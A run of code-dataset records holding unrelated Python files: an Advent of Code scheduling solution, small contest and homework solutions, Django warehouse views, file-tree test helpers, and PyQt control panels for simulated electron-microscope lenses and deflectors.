sorted(leaf_nodes(nodes))\n while available:\n scheduled = available[0]\n scheduled_node = nodes.pop(scheduled)\n\n for name in scheduled_node.next:\n node = nodes[name]\n node.prev.discard(scheduled)\n\n available = sorted(leaf_nodes(nodes))\n\n schedule.append(scheduled)\n\n return schedule\n\n\ndef multi_schedule_nodes(nodes: Dict[str, Node],\n num_workers: int,\n base_cost: int) -> int:\n\n for _, node in nodes.items():\n node.cost += base_cost\n\n workers = [id for id in range(num_workers)]\n jobs = {id: None for id in workers}\n\n available = sorted(leaf_nodes(nodes))\n done: List[str] = []\n time = 0\n\n msg = 
'Second '\n for id in workers:\n msg += f'Worker {id} '\n msg += 'Done'\n print(msg)\n\n while True:\n # Schedule jobs to idle workers\n idle_workers = [id for id, node in jobs.items() if node is None]\n for worker in idle_workers:\n if not available:\n break\n jobs[worker] = available.pop(0)\n\n # Logging\n msg = f'{time:4d} '\n sorted_job_nodes = [jobs[id] for id in workers]\n for node in sorted_job_nodes:\n if node is None:\n node = '.'\n msg += f' {node:^8} '\n done_str = ''.join(done)\n msg += done_str\n print(msg)\n\n if not nodes:\n break\n\n # Apply work: reduce each job node's cost by 1\n active_workers = [id for id, node in jobs.items() if node is not None]\n for worker in active_workers:\n name = jobs[worker]\n node = nodes[name]\n node.update()\n\n # If node is completed, update graph\n if node.cost == 0:\n # Set worker to idle\n jobs[worker] = None\n # Remove this node from the list\n nodes.pop(name)\n done.append(name)\n # Remove this node from next node's state\n for next_name in node.next:\n next_node = nodes[next_name]\n next_node.prev.discard(name)\n\n scheduled = jobs.values()\n available = [name for name in sorted(leaf_nodes(nodes))\n if name not in scheduled]\n # print(nodes)\n\n time += 1\n\n return time\n\n\ntest_lines = \"\"\"Step C must be finished before step A can begin.\n Step C must be finished before step F can begin.\n Step A must be finished before step B can begin.\n Step A must be finished before step D can begin.\n Step B must be finished before step E can begin.\n Step D must be finished before step E can begin.\n Step F must be finished before step E can begin.\"\"\".split('\\n')\ntest_nodes = parse_nodes(test_lines)\nassert leaf_nodes(test_nodes) == ['C']\nassert ''.join(schedule_nodes(test_nodes)) == 'CABDFE'\nassert multi_schedule_nodes(test_nodes, 2, 0) == 15\n\nif __name__ == '__main__':\n with open('data/day_07.txt') as f:\n nodes = parse_nodes(f.readlines())\n print(''.join(schedule_nodes(nodes)))\n print(multi_schedule_nodes(nodes, 5, 60))\n","repo_name":"seeM/advent-of-code-2018","sub_path":"day_07.py","file_name":"day_07.py","file_ext":"py","file_size_in_byte":6112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15174835199","text":"s = input()\r\n\r\nans = 0\r\nfor i, x in enumerate(s):\r\n if i % 2 == 0 and x == 'p':\r\n ans -= 1\r\n elif i % 2 == 1 and x == 'g':\r\n ans += 1\r\n\r\nprint(ans)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc062/B/4408233.py","file_name":"4408233.py","file_ext":"py","file_size_in_byte":167,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"39993157361","text":"\"\"\"\nТак как ограничения в задаче малы - можно решить перебором\n\"\"\"\n\n\ndef walk_right(lst, house):\n \"\"\"\n Двигаемся от текущего дома вправо\n\n :param lst: список с домами\n :param house: текущий индекс здания\n :return: расстояние от дома до магазина\n \"\"\"\n num = house + 1\n while num < 10:\n if lst[num] == 2:\n return num - house\n num += 1\n return 11\n\n\ndef walk_left(lst, house):\n \"\"\"\n Двигаемся от текущего дома влево\n\n :param lst: список с домами\n :param house: текущий индекс здания\n :return: расстояние от дома до магазина\n \"\"\"\n num = house - 1\n while num >= 0:\n if lst[num] == 2:\n return house - num\n num -= 1\n return 11\n\n\nif __name__ == '__main__':\n a = list(map(int, input().split())) # считываем весь список домов\n\n max_path = 0 # максимальное расстояние\n\n for 
index, elem in enumerate(a):\n if elem == 1:\n # если элемент - дом, то ищем минимальное расстояние до магазина\n # и сравниваем с текущим максимумом\n max_path = max(min(walk_right(a, index),\n walk_left(a, index)),\n max_path)\n print(max_path) # выодим ответ\n","repo_name":"danfimov/yandex-algorithm-trainings","sub_path":"Division_B/Homework_2/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31367099295","text":"from django.shortcuts import render, redirect\r\nfrom django.contrib.auth.decorators import login_required\r\nfrom .models import Products\r\nfrom .forms import ProductsForm\r\nfrom .filters import filterProducts\r\n\r\n\r\n\r\n\r\n# Create your views here.\r\n\r\n\r\n@login_required(login_url='login')\r\ndef index(request):\r\n return render(request, 'index.html')\r\n\r\n@login_required(login_url='login')\r\ndef addProduct(request):\r\n if request.method =='POST':\r\n name = request.POST['productname']\r\n category = request.POST['productcategory']\r\n quantity = request.POST['productquantity']\r\n price = request.POST['productprice']\r\n\r\n new_product = Products(name = name, category = category, quantity = quantity, price = price)\r\n new_product.save()\r\n\r\n return render(request, 'addProduct.html')\r\n\r\n@login_required(login_url='login')\r\ndef displayProduct(request):\r\n items = Products.objects.all() # using ORM\r\n # items = Products.objects.raw('SELECT * FROM displayProduct') -> for using SQL\r\n context = {\r\n 'items': items,\r\n \r\n }\r\n return render(request, 'displayProduct.html', context)\r\n\r\ndef delete(request, pk):\r\n remove = Products.objects.get(id=pk)\r\n if request.method == 'POST':\r\n remove.delete()\r\n return redirect ('displayProduct')\r\n return render(request, 'delete.html')\r\n\r\ndef update(request, pk):\r\n product = Products.objects.get(id=pk)\r\n form = ProductsForm(instance=product)\r\n if request.method == 'POST':\r\n form = ProductsForm(request.POST, instance=product)\r\n if form.is_valid():\r\n form.save()\r\n return redirect('displayProduct')\r\n\r\n context = {\r\n 'form':form,\r\n }\r\n return render(request, 'update.html', context)\r\n\r\n\r\n\r\n\r\n\r\n\r\n@login_required(login_url='login')\r\ndef searchProduct(request):\r\n product = Products.objects.all()\r\n filters = filterProducts(request.GET, queryset=product)\r\n\r\n context = {\r\n 'filters' : filters\r\n }\r\n return render(request, 'searchProduct.html', context)\r\n\r\n\r\n\r\n\r\n\r\n\r\n@login_required(login_url='login')\r\ndef totalpriceofProduct(request,self):\r\n price = self.product.price\r\n quantity = self.quantity\r\n total = price*quantity\r\n \r\n print(total)\r\n \r\n return render(request, 'totalpriceofProduct.html')\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n@login_required(login_url='login')\r\ndef contacts(request):\r\n if request.method == \"POST\":\r\n contacts=contacts()\r\n name=request.POST.get('name')\r\n email=request.POST.get('emal')\r\n message=request.POST,get('message')\r\n\r\n contacts.name = name\r\n contacts.email = email\r\n contacts.message = message\r\n contacts.save()\r\n return redirect ('displayProduct')\r\n\r\n return render(request, 'contacts.html')\r\n\r\n\r\n\r\n\r\n\r\n@login_required(login_url='login')\r\ndef contactsfinal(request):\r\n return render(request, 
'contactsfinal.html')\r\n","repo_name":"amanuel-lab/Warehouse-Managment-System-Final-Project","sub_path":"warehouseproject/warehouseapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18975694905","text":"import logging\nimport sys\nfrom functools import reduce\nimport operator\nimport os\nimport shutil\nimport tempfile\nimport unittest\n\nlogging.basicConfig(stream=sys.stdout, level=logging.DEBUG)\n\nlogger = logging.getLogger()\n\n\ndef get_from_dict(data_dict, map_list):\n return reduce(operator.getitem, map_list, data_dict)\n\n\ndef set_in_dict(data_dict, map_list, value):\n get_from_dict(data_dict, map_list[:-1])[map_list[-1]] = value\n\n\ndef list_files(start_path):\n for root, dirs, files in os.walk(start_path, followlinks=True):\n level = root.replace(start_path, \"\").count(os.sep)\n indent = \" \" * 4 * level\n print(\"{}{}/\".format(indent, os.path.basename(root)))\n sub_indent = \" \" * 4 * (level + 1)\n for f in files:\n file_name = f\n if os.path.islink(os.path.join(root, f)):\n f += \"*\"\n print(\"{}{}\".format(sub_indent, file_name))\n\n\ndef dir_dict(start_path):\n structure = {}\n for root, dirs, files in os.walk(start_path, followlinks=True):\n current_level = os.path.relpath(root, start_path).split(os.sep)\n depth = len(current_level)\n if depth >= 1 and current_level[0] != \".\":\n current_dict = get_from_dict(structure, current_level)\n else:\n current_dict = structure\n\n for d in dirs:\n current_dict[d] = {}\n for f in files:\n current_dict[f] = \"\"\n return structure\n\n\ndef handle_links(function, path, execinfo):\n if function is os.path.islink:\n os.unlink(path)\n\n\ndef create_files_from_tree(tree, parent=\"\"):\n for name, content in tree.items():\n name = os.path.join(parent, name)\n if type(content) is dict:\n os.makedirs(name)\n create_files_from_tree(content, parent=name)\n else:\n open(name, \"a\").close()\n\n\nclass FileLinkTestCase(unittest.TestCase):\n def setUp(self):\n self.source_dir = tempfile.mkdtemp()\n self.source_tree = {}\n\n self.dest_dir = tempfile.mkdtemp()\n self.dest_tree = {}\n\n self.expected_tree = {}\n\n self.config_file_path = os.path.join(self.source_dir, \".cfgcaddy.yml\")\n\n open(self.config_file_path, \"a\").close()\n\n def tearDown(self):\n shutil.rmtree(self.source_dir, onerror=handle_links)\n shutil.rmtree(self.dest_dir, onerror=handle_links)\n\n def recursive_dircmp(self, dircmp_obj):\n self.assertListEqual(dircmp_obj.left_only, [])\n self.assertListEqual(dircmp_obj.right_only, [])\n for directory, sub_directory in dircmp_obj.subdirs.items():\n self.recursive_dircmp(sub_directory)\n\n def assertDestMatchesExpected(self):\n dest_tree = dir_dict(self.dest_dir)\n\n self.assertEqual(self.expected_tree, dest_tree)\n","repo_name":"tstapler/cfgcaddy","sub_path":"tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"74317359272","text":"\nfrom PyQt5.QtWidgets import (\n QSlider,\n QLabel,\n QHBoxLayout,\n QVBoxLayout,\n QGroupBox,\n QCheckBox,\n QPushButton,\n QLineEdit\n)\n\nfrom PyQt5.QtGui import QDoubleValidator, QValidator\n\nimport numpy as np\nfrom pyqtgraph.Qt import QtCore\nfrom PyQt5.QtCore import Qt, pyqtSignal\nfrom functools import partial\n\n# class NotEmptyValidator(QValidator):\n\n \n # def validate(self, text: str, pos):\n # if 
text.strip().isdigit():\n # state = QValidator.Acceptable\n # else:\n # state = QValidator.Intermediate # so that field can be made empty temporarily\n # return state, text, pos\n \n'''This code makes the GUI interface for each component. \nThere is a lot of copypaste in this section'''\n\nclass LensGui():\n\n def __init__(self, name, f):\n '''GUI for the Lens component\n ----------\n name : str\n Name of component\n f : float\n Focal length\n '''\n self.box = QGroupBox(name)\n self.fslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.fslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.fslider.setMinimum(-10)\n self.fslider.setMaximum(10)\n self.fslider.setValue(1)\n self.fslider.setTickPosition(QSlider.TicksBelow)\n \n self.flineedit = QLineEdit(\"{:.4f}\".format(f))\n self.flineeditstep = QLineEdit(\"{:.4f}\".format(0.1))\n \n self.fwobblefreqlineedit = QLineEdit(\"{:.4f}\".format(1))\n self.fwobbleamplineedit = QLineEdit(\"{:.4f}\".format(0.5))\n \n qdoublevalidator = QDoubleValidator()\n self.flineedit.setValidator(qdoublevalidator)\n self.flineeditstep.setValidator(qdoublevalidator)\n self.fwobblefreqlineedit.setValidator(qdoublevalidator)\n self.fwobbleamplineedit.setValidator(qdoublevalidator)\n \n self.fwobble = QCheckBox('Wobble Lens Current')\n\n hbox = QHBoxLayout()\n hbox_lineedit = QHBoxLayout()\n hbox_lineedit.addWidget(QLabel('Focal Length = '))\n hbox_lineedit.addWidget(self.flineedit)\n hbox_lineedit.addWidget(QLabel('Slider Step = '))\n hbox_lineedit.addWidget(self.flineeditstep)\n hbox_slider = QHBoxLayout()\n hbox_slider.addWidget(self.fslider)\n hbox_wobble = QHBoxLayout()\n hbox_wobble.addWidget(self.fwobble)\n hbox_wobble.addWidget(QLabel('Wobble Frequency'))\n hbox_wobble.addWidget(self.fwobblefreqlineedit)\n hbox_wobble.addWidget(QLabel('Wobble Amplitude'))\n hbox_wobble.addWidget(self.fwobbleamplineedit)\n\n vbox = QVBoxLayout()\n vbox.addLayout(hbox_lineedit)\n vbox.addLayout(hbox_slider)\n vbox.addLayout(hbox_wobble)\n vbox.addStretch()\n\n self.box.setLayout(vbox)\n \n self.table = QGroupBox(name)\n self.flabel_table = QLabel('Focal Length = ' + \"{:.2f}\".format(f))\n self.flabel_table.setMinimumWidth(80)\n hbox = QHBoxLayout()\n hbox = QHBoxLayout()\n hbox.addWidget(self.flabel_table)\n\n vbox = QVBoxLayout()\n vbox.addLayout(hbox)\n self.table.setLayout(vbox)\n \nclass AstigmaticLensGui():\n '''Gui for the Astigmatic Lens component\n ''' \n def __init__(self, name, gui_label, comp_type, fx, fy):\n '''\n\n Parameters\n ----------\n name : str\n Name of component\n gui_label : str\n Label of focal length slider in GUI\n fx : float\n Focal length in x axis\n fy : float\n Focal length in y axis\n '''\n self.box = QGroupBox(name)\n self.fxslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.fxslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.fxslider.setMinimum(-10)\n self.fxslider.setMaximum(10)\n self.fxslider.setValue(1)\n self.fxslider.setTickPosition(QSlider.TicksBelow)\n self.fxlineedit = QLineEdit(\"{:.4f}\".format(fx))\n self.fxlineeditstep = QLineEdit(\"{:.4f}\".format(0.1))\n \n qdoublevalidator = QDoubleValidator()\n self.fxlineedit.setValidator(qdoublevalidator)\n self.fxlineeditstep.setValidator(qdoublevalidator)\n \n hbox = QHBoxLayout()\n hbox_lineedit = QHBoxLayout()\n hbox_lineedit.addWidget(QLabel('Focal Length X = '))\n hbox_lineedit.addWidget(self.fxlineedit)\n hbox_lineedit.addWidget(QLabel('Slider Step X = '))\n hbox_lineedit.addWidget(self.fxlineeditstep)\n hbox_slider = QHBoxLayout()\n 
hbox_slider.addWidget(self.fxslider)\n\n vbox = QVBoxLayout()\n vbox.addLayout(hbox_lineedit)\n vbox.addLayout(hbox_slider)\n vbox.addStretch()\n \n self.fyslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.fyslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.fyslider.setMinimum(-10)\n self.fyslider.setMaximum(10)\n self.fyslider.setValue(1)\n self.fyslider.setTickPosition(QSlider.TicksBelow)\n \n self.fylineedit = QLineEdit(\"{:.4f}\".format(fy))\n self.fylineeditstep = QLineEdit(\"{:.4f}\".format(0.1))\n self.fywobblineedit = QLineEdit(\"{:.4f}\".format(fy))\n self.fwobblefreqlineedit = QLineEdit(\"{:.4f}\".format(1))\n self.fwobbleamplineedit = QLineEdit(\"{:.4f}\".format(0.5))\n \n self.fylineedit.setValidator(qdoublevalidator)\n self.fylineeditstep.setValidator(qdoublevalidator)\n self.fwobbleamplineedit.setValidator(qdoublevalidator)\n self.fwobblefreqlineedit.setValidator(qdoublevalidator)\n \n self.fwobble = QCheckBox('Wobble Lens Current')\n\n hbox = QHBoxLayout()\n hbox_lineedit = QHBoxLayout()\n hbox_lineedit.addWidget(QLabel('Focal Length Y = '))\n hbox_lineedit.addWidget(self.fylineedit)\n hbox_lineedit.addWidget(QLabel('Slider Step Y = '))\n hbox_lineedit.addWidget(self.fylineeditstep)\n hbox_slider = QHBoxLayout()\n hbox_slider.addWidget(self.fyslider)\n \n vbox.addLayout(hbox_lineedit)\n vbox.addLayout(hbox_slider)\n \n if comp_type == 'Quadrupole':\n pass\n else:\n hbox_wobble = QHBoxLayout()\n hbox_wobble.addWidget(self.fwobble)\n hbox_wobble.addWidget(QLabel('Wobble Frequency'))\n hbox_wobble.addWidget(self.fwobblefreqlineedit)\n hbox_wobble.addWidget(QLabel('Wobble Amplitude'))\n hbox_wobble.addWidget(self.fwobbleamplineedit)\n vbox.addLayout(hbox_wobble)\n \n vbox.addStretch()\n\n self.box.setLayout(vbox)\n \n self.table = QGroupBox(name)\n \n self.flabelx_table = QLabel('Focal Length X = ' + \"{:.2f}\".format(fx))\n self.flabelx_table.setMinimumWidth(80)\n hbox = QHBoxLayout()\n hbox.addWidget(self.flabelx_table)\n \n self.flabely_table = QLabel('Focal Length Y = ' + \"{:.2f}\".format(fy))\n self.flabely_table.setMinimumWidth(80)\n hbox = QHBoxLayout()\n hbox.addWidget(self.flabely_table)\n\n vbox = QVBoxLayout()\n vbox.addLayout(hbox)\n self.table.setLayout(vbox)\n\nclass SampleGui():\n '''Gui to allow a user to move the sample in the 3D model\n ''' \n def __init__(self, name, x, y):\n '''\n\n Parameters\n ----------\n name : str\n Name of the component\n x : float\n X position of component\n y : float\n Y position of component\n '''\n self.box = QGroupBox(name)\n self.xslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.xslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.xslider.setMinimum(-100)\n self.xslider.setMaximum(100)\n self.xslider.setValue(int(round(x)))\n self.xslider.setTickPosition(QSlider.TicksBelow)\n\n self.xlabel = QLabel('X Position = ' + \"{:.2f}\".format(x))\n self.xlabel.setMinimumWidth(80)\n\n hbox = QHBoxLayout()\n hbox_labels = QHBoxLayout()\n hbox_labels.addWidget(self.xlabel)\n hbox.addSpacing(10)\n hbox.addWidget(self.xslider)\n\n vbox = QVBoxLayout()\n vbox.addLayout(hbox_labels)\n vbox.addLayout(hbox)\n\n self.yslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.yslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.yslider.setMinimum(-100)\n self.yslider.setMaximum(100)\n self.yslider.setValue(int(round(y)))\n self.yslider.setTickPosition(QSlider.TicksBelow)\n\n self.ylabel = QLabel('Y Position = ' + \"{:.2f}\".format(y))\n self.ylabel.setMinimumWidth(80)\n\n hbox = QHBoxLayout()\n 
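# layout sketch: one row for the text label, one row for the slider; the\n        # identical two-row pattern is repeated below for the Y axis.\n        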
hbox_labels = QHBoxLayout()\n hbox_labels.addWidget(self.ylabel)\n hbox.addSpacing(10)\n hbox.addWidget(self.yslider)\n\n vbox.addLayout(hbox_labels)\n vbox.addLayout(hbox)\n vbox.addStretch()\n\n self.box.setLayout(vbox)\n \n self.table = QGroupBox(name)\n self.xlabel_table = QLabel('X Position = ' + \"{:.2f}\".format(x))\n self.xlabel_table.setMinimumWidth(80)\n hbox = QHBoxLayout()\n hbox_labels = QHBoxLayout()\n hbox_labels.addWidget(self.xlabel_table)\n \n self.ylabel_table = QLabel('Y Position = ' + \"{:.2f}\".format(y))\n self.ylabel_table.setMinimumWidth(80)\n hbox_labels.addWidget(self.ylabel_table)\n\n vbox = QVBoxLayout()\n vbox.addLayout(hbox_labels)\n vbox.addLayout(hbox)\n self.table.setLayout(vbox)\n\nclass DeflectorGui():\n '''GUI for the deflector component\n ''' \n def __init__(self, name, defx, defy):\n '''\n\n Parameters\n ----------\n name : str\n Name of component\n defx : float\n Initial X deflection of deflector\n defy : float\n Initial Y deflection of deflector\n '''\n self.box = QGroupBox(name)\n self.defxslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.defxslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.defxslider.setMinimum(-10)\n self.defxslider.setMaximum(10)\n self.defxslider.setValue(1)\n self.defxslider.setTickPosition(QSlider.TicksBelow)\n \n qdoublevalidator = QDoubleValidator()\n self.defxlineedit = QLineEdit(\"{:.4f}\".format(defx))\n self.defxlineeditstep = QLineEdit(\"{:.4f}\".format(0.1))\n self.defxlineedit.setValidator(qdoublevalidator)\n self.defxlineeditstep.setValidator(qdoublevalidator)\n \n self.defyslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.defyslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.defyslider.setMinimum(-10)\n self.defyslider.setMaximum(10)\n self.defyslider.setValue(1)\n self.defyslider.setTickPosition(QSlider.TicksBelow)\n self.defylineedit = QLineEdit(\"{:.4f}\".format(defy))\n self.defylineeditstep = QLineEdit(\"{:.4f}\".format(0.1))\n self.defylineedit.setValidator(qdoublevalidator)\n self.defylineeditstep.setValidator(qdoublevalidator)\n\n hbox = QHBoxLayout()\n hbox_lineedit = QHBoxLayout()\n hbox_lineedit.addWidget(QLabel('X Deflection = '))\n hbox_lineedit.addWidget(self.defxlineedit)\n hbox_lineedit.addWidget(QLabel('Slider Step X = '))\n hbox_lineedit.addWidget(self.defxlineeditstep)\n hbox_lineedit.addWidget(QLabel('Y Deflection = '))\n hbox_lineedit.addWidget(self.defylineedit)\n hbox_lineedit.addWidget(QLabel('Slider Step Y = '))\n hbox_lineedit.addWidget(self.defylineeditstep)\n hbox_slider = QHBoxLayout()\n hbox_slider.addWidget(self.defxslider)\n hbox_slider.addWidget(self.defyslider)\n\n vbox = QVBoxLayout()\n vbox.addLayout(hbox_lineedit)\n vbox.addLayout(hbox_slider)\n vbox.addStretch()\n\n self.box.setLayout(vbox)\n \n self.table = QGroupBox(name)\n self.defxlabel_table = QLabel('X Deflection = ' + \"{:.2f}\".format(defx))\n self.defxlabel_table.setMinimumWidth(80)\n self.defylabel_table = QLabel('Y Deflection = ' + \"{:.2f}\".format(defy))\n self.defylabel_table.setMinimumWidth(80)\n hbox = QHBoxLayout()\n hbox_labels = QHBoxLayout()\n hbox_labels.addWidget(self.defxlabel_table)\n hbox_labels.addWidget(self.defylabel_table)\n \n vbox = QVBoxLayout()\n vbox.addLayout(hbox_labels)\n vbox.addLayout(hbox)\n self.table.setLayout(vbox)\n\n\nclass DoubleDeflectorGui():\n '''GUI for the double deflector component\n ''' \n def __init__(self, name, updefx, updefy, lowdefx, lowdefy):\n '''\n\n Parameters\n ----------\n name : str\n Name of component\n updefx : float\n 
Initial X deflection of upper deflector\n updefy : float\n Initial Y deflection of upper deflector\n lowdefx : float\n Initial X deflection of lower deflector\n lowdefy : float\n Initial Y deflection of lower deflector\n ''' \n self.box = QGroupBox(name)\n \n self.updefxslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.updefxslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.updefxslider.setMinimum(-10)\n self.updefxslider.setMaximum(10)\n self.updefxslider.setValue(1)\n self.updefxslider.setTickPosition(QSlider.TicksBelow)\n self.updefxlineedit = QLineEdit(\"{:.4f}\".format(updefx))\n self.updefxlineeditstep = QLineEdit(\"{:.4f}\".format(0.1))\n \n qdoublevalidator = QDoubleValidator()\n self.updefxlineedit.setValidator(qdoublevalidator)\n self.updefxlineeditstep.setValidator(qdoublevalidator)\n \n self.updefyslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.updefyslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.updefyslider.setMinimum(-10)\n self.updefyslider.setMaximum(10)\n self.updefyslider.setValue(1)\n self.updefyslider.setTickPosition(QSlider.TicksBelow)\n self.updefylineedit = QLineEdit(\"{:.4f}\".format(updefy))\n self.updefylineeditstep = QLineEdit(\"{:.4f}\".format(0.1))\n self.updefylineedit.setValidator(qdoublevalidator)\n self.updefylineeditstep.setValidator(qdoublevalidator)\n \n hbox = QHBoxLayout()\n hbox_lineedit = QHBoxLayout()\n hbox_lineedit.addWidget(QLabel('Upper X Deflection = '))\n hbox_lineedit.addWidget(self.updefxlineedit)\n hbox_lineedit.addWidget(QLabel('Slider Step Upper X = '))\n hbox_lineedit.addWidget(self.updefxlineeditstep)\n hbox_lineedit.addWidget(QLabel('Upper Y Deflection = '))\n hbox_lineedit.addWidget(self.updefylineedit)\n hbox_lineedit.addWidget(QLabel('Slider Step Upper Y = '))\n hbox_lineedit.addWidget(self.updefylineeditstep)\n \n hbox_slider = QHBoxLayout()\n hbox_slider.addWidget(self.updefxslider)\n hbox_slider.addWidget(self.updefyslider)\n \n vbox = QVBoxLayout()\n vbox.addLayout(hbox_lineedit)\n vbox.addLayout(hbox_slider)\n vbox.addStretch()\n \n self.lowdefxslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.lowdefxslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.lowdefxslider.setMinimum(-10)\n self.lowdefxslider.setMaximum(10)\n self.lowdefxslider.setValue(1)\n self.lowdefxslider.setTickPosition(QSlider.TicksBelow)\n self.lowdefxlineedit = QLineEdit(\"{:.4f}\".format(lowdefx))\n self.lowdefxlineeditstep = QLineEdit(\"{:.4f}\".format(0.1))\n self.lowdefxlineedit.setValidator(qdoublevalidator)\n self.lowdefxlineeditstep.setValidator(qdoublevalidator)\n \n self.lowdefyslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.lowdefyslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.lowdefyslider.setMinimum(-10)\n self.lowdefyslider.setMaximum(10)\n self.lowdefyslider.setValue(1)\n self.lowdefyslider.setTickPosition(QSlider.TicksBelow)\n self.lowdefylineedit = QLineEdit(\"{:.4f}\".format(lowdefy))\n self.lowdefylineeditstep = QLineEdit(\"{:.4f}\".format(0.1))\n self.lowdefylineedit.setValidator(qdoublevalidator)\n self.lowdefylineeditstep.setValidator(qdoublevalidator)\n \n hbox = QHBoxLayout()\n hbox_lineedit = QHBoxLayout()\n hbox_lineedit.addWidget(QLabel('Lower X Deflection = '))\n hbox_lineedit.addWidget(self.lowdefxlineedit)\n hbox_lineedit.addWidget(QLabel('Slider Step Lower X = '))\n hbox_lineedit.addWidget(self.lowdefxlineeditstep)\n hbox_lineedit.addWidget(QLabel('Lower Y Deflection = '))\n hbox_lineedit.addWidget(self.lowdefylineedit)\n 
hbox_lineedit.addWidget(QLabel('Slider Step Lower Y = '))\n hbox_lineedit.addWidget(self.lowdefylineeditstep)\n \n hbox_slider = QHBoxLayout()\n hbox_slider.addWidget(self.lowdefxslider)\n hbox_slider.addWidget(self.lowdefyslider)\n \n vbox.addLayout(hbox_lineedit)\n vbox.addLayout(hbox_slider)\n vbox.addStretch()\n\n self.xbuttonwobble = QCheckBox(\"Wobble Upper Deflector X\")\n self.defxwobblefreqlineedit = QLineEdit(\"{:.4f}\".format(1))\n self.defxwobbleamplineedit = QLineEdit(\"{:.4f}\".format(0.5))\n self.defxratiolabel = QLabel('Deflector X Response Ratio = ')\n self.defxratiolineedit = QLineEdit(\"{:.4f}\".format(0.0))\n self.defxratiolineeditstep = QLineEdit(\"{:.4f}\".format(0.1))\n \n self.defxratiolineedit.setValidator(qdoublevalidator)\n self.defxratiolineeditstep.setValidator(qdoublevalidator)\n \n self.defxratioslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.defxratioslider.setMinimum(-10)\n self.defxratioslider.setMaximum(10)\n self.defxratioslider.setValue(1)\n self.defxratioslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.defxratioslider.setTickPosition(QSlider.TicksBelow)\n\n hbox = QHBoxLayout()\n hbox.addWidget(self.xbuttonwobble)\n hbox.addWidget(QLabel('Wobble X Frequency'))\n hbox.addWidget(self.defxwobblefreqlineedit)\n hbox.addWidget(QLabel('Wobble X Amplitude'))\n hbox.addWidget(self.defxwobbleamplineedit)\n vbox.addLayout(hbox)\n \n hbox = QHBoxLayout()\n hbox.addWidget(self.defxratiolabel)\n hbox.addWidget(self.defxratiolineedit)\n hbox.addWidget(QLabel('Def Ratio X Response Slider Step = '))\n hbox.addWidget(self.defxratiolineeditstep)\n vbox.addLayout(hbox)\n \n hbox = QHBoxLayout()\n hbox.addWidget(self.defxratioslider)\n vbox.addLayout(hbox)\n\n self.ybuttonwobble = QCheckBox(\"Wobble Upper Deflector Y\")\n self.defywobblefreqlineedit = QLineEdit(\"{:.4f}\".format(1))\n self.defywobbleamplineedit = QLineEdit(\"{:.4f}\".format(0.5))\n self.defyratiolabel = QLabel('Deflector Y Response Ratio = ')\n self.defyratiolineedit = QLineEdit(\"{:.4f}\".format(0.0))\n self.defyratiolineeditstep = QLineEdit(\"{:.4f}\".format(0.1))\n self.defyratiolineedit.setValidator(qdoublevalidator)\n self.defyratiolineeditstep.setValidator(qdoublevalidator)\n \n self.defyratioslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.defyratioslider.setMinimum(-10)\n self.defyratioslider.setMaximum(10)\n self.defyratioslider.setValue(1)\n self.defyratioslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.defyratioslider.setTickPosition(QSlider.TicksBelow)\n \n self.usedefratio = QCheckBox(\"Use Def Ratio\")\n \n hbox = QHBoxLayout()\n hbox.addWidget(self.ybuttonwobble)\n hbox.addWidget(QLabel('Wobble Y Frequency'))\n hbox.addWidget(self.defywobblefreqlineedit)\n hbox.addWidget(QLabel('Wobble Y Amplitude'))\n hbox.addWidget(self.defywobbleamplineedit)\n vbox.addLayout(hbox)\n \n hbox = QHBoxLayout()\n hbox.addWidget(self.defyratiolabel)\n hbox.addWidget(self.defyratiolineedit)\n hbox.addWidget(QLabel('Def Ratio Y Response Slider Step = '))\n hbox.addWidget(self.defyratiolineeditstep)\n vbox.addLayout(hbox)\n \n hbox = QHBoxLayout()\n hbox.addWidget(self.defyratioslider)\n vbox.addLayout(hbox)\n hbox = QHBoxLayout()\n hbox.addWidget(self.usedefratio)\n vbox.addLayout(hbox)\n \n self.box.setLayout(vbox)\n\n hbox = QHBoxLayout()\n self.table = QGroupBox(name)\n self.updefxlabel_table = QLabel('Upper X Deflection = ' + \"{:.2f}\".format(updefx))\n self.updefxlabel_table.setMinimumWidth(80)\n self.updefylabel_table = QLabel('Upper Y Deflection = ' + 
